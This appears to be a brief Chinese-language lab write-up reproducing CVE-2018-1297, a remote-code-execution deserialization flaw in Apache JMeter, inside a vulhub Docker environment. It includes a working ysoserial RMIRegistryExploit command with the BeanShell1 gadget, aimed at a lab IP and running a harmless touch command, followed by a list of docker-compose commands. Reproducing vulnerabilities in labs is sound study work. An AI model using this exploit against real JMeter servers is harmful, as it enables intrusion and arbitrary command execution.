声明
好好学习,天天向上
漏洞描述
Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编写的用于压力测试和性能测试的开源软件。其2.x版本和3.x版本中存在反序列化漏洞,攻击者可以利用该漏洞在目标服务器上执行任意命令。
影响范围
2.x
3.x
复现过程
这里使用3.3版本
使用vulhub
/app/vulhub-master/jmeter/CVE-2018-1297
使用docker启动
docker-compose build
docker-compose up -d
kali执行
java -cp ysoserial-master-30099844c6-1.jar ysoserial.exploit.RMIRegistryExploit 192.168.239.129 1099 BeanShell1 'touch /tmp/cve-2018-1297'
关闭镜像(每次用完后关闭)
docker-compose down
docker-compose常用命令
拉镜像(进入到vulhub某个具体目录后)
docker-compose build
docker-compose up -d
镜像查询(查到的第一列就是ID值)
docker ps -a
进入指定镜像里面(根据上一条查出的ID进入)
docker exec -it ID /bin/bash
关闭镜像(每次用完后关闭)
docker-compose down